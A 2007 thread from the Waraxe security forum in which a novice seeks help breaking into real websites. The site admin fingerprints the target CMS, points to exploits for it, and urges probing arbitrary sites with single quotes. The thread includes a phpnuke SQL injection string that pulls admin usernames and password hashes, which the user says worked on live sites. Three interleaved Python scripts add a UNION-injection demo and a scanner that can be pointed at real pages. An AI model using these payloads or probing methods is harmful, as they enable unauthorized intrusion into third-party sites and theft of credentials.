Waraxe IT Security Portal
Perhaps, too much information shown?
Posted: Fri Aug 31, 2007 4:43 am
Dorsk
Regular user
Joined: Aug 28, 2007
Posts: 20

Hey all!
I have a snippet of code here that I would like you to take a look at:
Code:
<form method="post" name="login" action="checklogin.php">
<td> <div align="center">

<input name="ws_user" type="text" class="form_username" onFocus="this.className='form_on'" onBlur="this.className='form_off'" size="10">
<input name="pwd" type="password" class="form_password" onFocus="this.className='form_on'" onBlur="this.className='form_off'" size="10">
<br>
<input type="submit" name="Submit" value="Submit">
</div></td>
</form>

It was taken from a website login box. I am almost positive the site is NOT PHPNUKE. To me, it looks like there is a lot of information that maybe "shouldn't" be here, meaning that an attacker has a lot of information here to get past this little login.

Also, what type of code can I type into the URL to do a search on the database (with the above code). I am learning php, but like everyone, we all have questions!

I have been tinkering around on hackthissite.org and I seem to understand a good amount, and get through some of the missions (I have completed all of the basic ones, and am starting on the 2nd "realistic" mission), so with that knowledge, I came up with an idea of what might work; if I am wrong, let me know!

Here is an example I came up with:
Code:
somewebsite.com/index.php?WHERE "something=something" AND "something=something

Please forgive my noobiness. We all gotta start somewhere.
Posted: Fri Aug 31, 2007 9:37 am
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

Your first example is a common login form and has nothing wrong with it in itself.
But if we do a Google search for "ws_user", we find something like this:

http://cms.webspell.org/index.php?site=demo

Comparing the login forms, we can see a close resemblance, so it could be WebSpell CMS.
And next, looking for exploits for WebSpell:

http://www.securityfocus.com/archive/1/archive/1/460937/100/0/threaded

Your second example: what are you trying to say?
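
Waraxe's fingerprinting step, as an added example that is not code from the thread: the script parses whatever HTML you hand it, collects the input names per form, and matches them against a table of known login-form signatures. The only signature included is the one the thread supports (webSPELL's ws_user/pwd pair); SAMPLE_HTML is constructed from the form quoted in the first post plus an unrelated search box, so the run is offline.

```python
"""Fingerprint a web application from the input names in its login form.

Added example, not code from the thread. The webSPELL signature is the
ws_user/pwd pair the thread points at; SAMPLE_HTML is constructed from
the form quoted in the first post plus an unrelated search form.
"""
from html.parser import HTMLParser

# Application -> set of input names its login form is known to carry.
# Extend with further pairs as you confirm them against live forms.
SIGNATURES = {
    "webSPELL": {"ws_user", "pwd"},
}


class FormFieldCollector(HTMLParser):
    """Collect the name attribute of every <input> inside each <form>."""

    def __init__(self):
        super().__init__()
        self.forms = []        # [{"action": str, "fields": set}]
        self._current = None

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self._current = {"action": attrs.get("action") or "", "fields": set()}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            name = attrs.get("name")
            if name:
                self._current["fields"].add(name)

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def extract_forms(html):
    """Return the forms found in html, each with its action and set of input names."""
    parser = FormFieldCollector()
    parser.feed(html)
    parser.close()
    return parser.forms


def fingerprint(html):
    """Return (application, matched_fields, form_action) for every signature hit."""
    hits = []
    for form in extract_forms(html):
        for app, sig in SIGNATURES.items():
            # Subset test: extra inputs such as the Submit button do not interfere.
            if sig <= form["fields"]:
                hits.append((app, sorted(sig), form["action"]))
    return hits


# Constructed sample: a search box, then the login form from the first post.
SAMPLE_HTML = """
<form method="get" action="search.php"><input name="q" type="text"></form>
<form method="post" name="login" action="checklogin.php">
<input name="ws_user" type="text" class="form_username" size="10">
<input name="pwd" type="password" class="form_password" size="10">
<br>
<input type="submit" name="Submit" value="Submit">
</form>
"""

if __name__ == "__main__":
    for app, fields, action in fingerprint(SAMPLE_HTML):
        print(f"{app}: login form posting to {action!r} carries {fields}")
```

Field names are one signal, not proof: themes and forks copy login markup, so confirm the guess against the vendor demo the way waraxe did before looking up advisories for it.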
Posted: Fri Aug 31, 2007 4:34 pm
Dorsk
Regular user

I have done some searching in your forums and I was wondering if there was a way to query the database, either by the URL bar or by the search engine that is integrated within a website.

For my example:
Code:
somewebsite.com/index.php?WHERE "something=something" AND "something=something

Is there a way to implement code like this to bring back such information from the website's database?
I have used your:
Code:
p0hh0nsee%') UNION ALL SELECT 1,2,aid,pwd,5,6,7,8,9,10 FROM nuke_authors/*

with some nice success rates (however, on many sites it sends me right back to the main page (index.php) right after I submit the search).

I am looking for something perhaps around the same lines.

Idea: Is there anything about using the forum search to get information from the database (usernames, hashes, pwds, etc.)?

Side note: I have tested many of the examples on the forums in PHPNUKE sites (many versions) and if I input a ` in the login box, it sends me to a blank page that says "begone" on it. Why is that?

Thanks a lot!
Posted: Fri Aug 31, 2007 4:56 pm
waraxe
Site admin

First, this "begone" message is the result of some anti-SQL-injection code in the phpnuke scripts. It is meant to make SQL injection attacks and XSS abuse more difficult, and it works as expected.

Now, that "exploit line" you are using is written specifically for phpnuke.
If you want to attack targets other than phpnuke-powered ones, you can always make your own working "exploit strings".

One more thing: you must understand that SQL injection is a security hole, a programming bug or "feature", and if the programmer was good and wrote the PHP code carefully, then you just can't steal any information from the database or make other DB manipulations.
But if the website is written insecurely, or the webserver has "magic_quotes=off" and the programmer expected "=on", then there are lots of possibilities: stealing admin passwords, customer data from e-shops, etc.
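
Why the "exploit line" is tied to one query shape, and why a carefully written script leaves nothing to steal, as an added example that is not code from the thread or from phpnuke. It rebuilds one search query three ways in Python with sqlite3 (standing in for PHP and MySQL): string concatenation with the quote reaching the SQL verbatim (the magic_quotes=off case waraxe describes), concatenation after an escaping step, and a parameterized query. The schema, the MD5-hashed passwords, and the UNION search term are all constructed for the demo; since SQLite has no backslash escapes, the escaping step doubles quotes rather than mimicking addslashes() exactly.

```python
"""SQL injection as a programming bug: one query, three ways of building it.

Added example, not code from the thread. sqlite3 stands in for PHP+MySQL;
the stories/authors schema, the hashes and the UNION term are constructed.
The search term is shaped like the thread's phpnuke string: close the LIKE
literal and the parenthesis, UNION in two columns, comment out the tail.
"""
import hashlib
import sqlite3


def make_db():
    """Constructed demo database: two stories, two authors with MD5 password hashes."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE stories (sid INTEGER, title TEXT)")
    con.executemany("INSERT INTO stories VALUES (?, ?)",
                    [(1, "Welcome"), (2, "Second story")])
    con.execute("CREATE TABLE authors (aid TEXT, pwd TEXT)")
    con.executemany("INSERT INTO authors VALUES (?, ?)",
                    [(u, hashlib.md5(p.encode()).hexdigest())
                     for u, p in [("admin", "admin"), ("editor", "password")]])
    return con


def escape_quotes(term):
    """Escaping step (the role magic_quotes played when it was on).
    SQLite has no backslash escapes, so quotes are doubled instead of addslashes()."""
    return term.replace("'", "''")


def search_concat(con, term, magic_quotes=False):
    """Search built by string concatenation, as a naive PHP script did it.

    magic_quotes=False is waraxe's case: the programmer relied on escaping
    the server does not apply, so the term lands in the SQL verbatim.
    """
    if magic_quotes:
        term = escape_quotes(term)
    sql = f"SELECT sid, title FROM stories WHERE (title LIKE '%{term}%')"
    return list(con.execute(sql))


def search_param(con, term):
    """Parameterized search: the term is data, never SQL, whatever it contains."""
    sql = "SELECT sid, title FROM stories WHERE (title LIKE ?)"
    return list(con.execute(sql, (f"%{term}%",)))


# Closes the '%...%' literal and the parenthesis, supplies exactly the two
# columns the outer SELECT has, and comments out the rest of the query.
UNION_TERM = "zzz%') UNION ALL SELECT aid, pwd FROM authors-- "


def demo():
    """Run the same term through all three query builders and collect the rows."""
    con = make_db()
    return {
        "honest_search": search_concat(con, "Welcome"),
        "injected_no_escaping": search_concat(con, UNION_TERM),
        "injected_with_escaping": search_concat(con, UNION_TERM, magic_quotes=True),
        "injected_parameterized": search_param(con, UNION_TERM),
    }


if __name__ == "__main__":
    for case, rows in demo().items():
        print(f"{case:24} -> {rows}")
```

Only the unescaped concatenation returns the authors table; the UNION term works there because it matches that exact query shape, and against a different query the same string is just a syntax error, which is why the phpnuke line does not transfer and each target needs its own. The parameterized version removes the problem outright instead of hoping the escaping step is switched on.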
Posted: Fri Aug 31, 2007 5:15 pm
Dorsk
Regular user

Thank you for your information about the "begone" message.

As for the "exploit line", I only use it for PHPNUKE. There are certain sites that do ban me for a "UNION ATTACK", and I am trying to find a way to change the code a bit so that will not happen, but no luck yet.

How do I go about checking if a webserver has "magic_quotes" on or off?

Currently I am interested in PHPNUKE sites only.
1 site in particular, it is PHPNUKE Platinum version 7.6.b.4
with NukeSentinel version 2.4.2pl1

Links, ideas, and information would be greatly helpful.
Posted: Fri Aug 31, 2007 5:47 pm
waraxe
Site admin

You have encountered "Sentinel", a powerful protection system for phpnuke. It is often very hard to bypass that anti-hacking system. And if someone finds a way, then Sentinel will be updated soon and the evasion problem remains.

Now, about "magic_quotes=off". My suggestion: surf the web and try to insert ("inject") single quotes into various URI parameters. If you see SQL-related error messages, then you are going in the right direction.

Some random examples:

http://www.hot.ee/http123/sql01.png

http://www.hot.ee/http123/sql02.png

See ya ;)
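
Waraxe's single-quote probe, as an added example that is not code from the thread: build_probes() appends a quote to each URI parameter in turn, and looks_like_sql_error() recognises the PHP mysql_* warning text and the MySQL syntax error that an unescaped quote typically produces in a page. The phpnuke-style URL, the two response bodies and fake_fetch() are constructed stand-ins, so nothing here is sent over the network.

```python
"""Probe URI parameters with a stray single quote and spot SQL error output.

Added example, not code from the thread. build_probes() appends the quote
to one query parameter at a time; looks_like_sql_error() recognises the
error text PHP mysql_* scripts and MySQL print when the quote reaches the
query unescaped. SAMPLE_URL, the response bodies and fake_fetch() are
constructed stand-ins; nothing here touches the network.
"""
import re
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

# Error fragments worth looking for in a response, most specific first.
SQL_ERROR_PATTERNS = [
    re.compile(r"You have an error in your SQL syntax", re.I),
    re.compile(r"supplied argument is not a valid MySQL result resource", re.I),
    re.compile(r"mysql_(?:fetch_array|fetch_assoc|fetch_row|num_rows|query)\(\)", re.I),
    re.compile(r"Warning: mysql_", re.I),
]


def build_probes(url, payload="'"):
    """Return (parameter_name, probe_url) pairs, one per query parameter."""
    parts = urlsplit(url)
    params = parse_qsl(parts.query, keep_blank_values=True)
    probes = []
    for i, (name, value) in enumerate(params):
        mutated = list(params)
        mutated[i] = (name, value + payload)   # urlencode turns ' into %27
        probes.append((name, urlunsplit(parts._replace(query=urlencode(mutated)))))
    return probes


def looks_like_sql_error(body):
    """Return the first matching error fragment in body, or None."""
    for pattern in SQL_ERROR_PATTERNS:
        match = pattern.search(body)
        if match:
            return match.group(0)
    return None


def probe_url(url, fetch):
    """Run every probe through fetch(url) -> body; report parameters whose probe errors."""
    findings = []
    for name, probe in build_probes(url):
        hit = looks_like_sql_error(fetch(probe))
        if hit:
            findings.append((name, hit))
    return findings


# Constructed sample: a phpnuke-style URL and two canned response bodies.
SAMPLE_URL = "http://example.invalid/modules.php?name=News&file=article&sid=5"
CLEAN_BODY = "<html><body><h1>Article</h1><p>Nothing to see.</p></body></html>"
BROKEN_BODY = ("<b>Warning</b>: mysql_fetch_array(): supplied argument is not a valid "
               "MySQL result resource in /var/www/modules/News/article.php on line 42")


def fake_fetch(url):
    """Stand-in for an HTTP GET: only the sid parameter misbehaves in this demo."""
    return BROKEN_BODY if "sid=5%27" in url else CLEAN_BODY


if __name__ == "__main__":
    for name, hit in probe_url(SAMPLE_URL, fake_fetch):
        print(f"parameter {name!r} produced: {hit}")
```

Swap fake_fetch for a real GET (for instance urllib.request.urlopen(probe).read().decode(errors="replace")) to run it against a page. A clean response does not clear a parameter: display_errors may be off or the injection may be blind, so this is a first filter rather than a verdict, and a fixed answer such as the "begone" page Dorsk saw means a filter replied before the database did.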
Posted: Fri Aug 31, 2007 6:07 pm
Dorsk
Regular user

Thank you very much! It is all making more sense to me.

I am going to install that PHPNUKE PLAT version and NukeSentinel on a remote computer for testing. If I find anything, or if you have any ideas, do not hesitate to PM me or reply to this post.

I will check this post often and like always, browse the forum for more information.

Thanks again!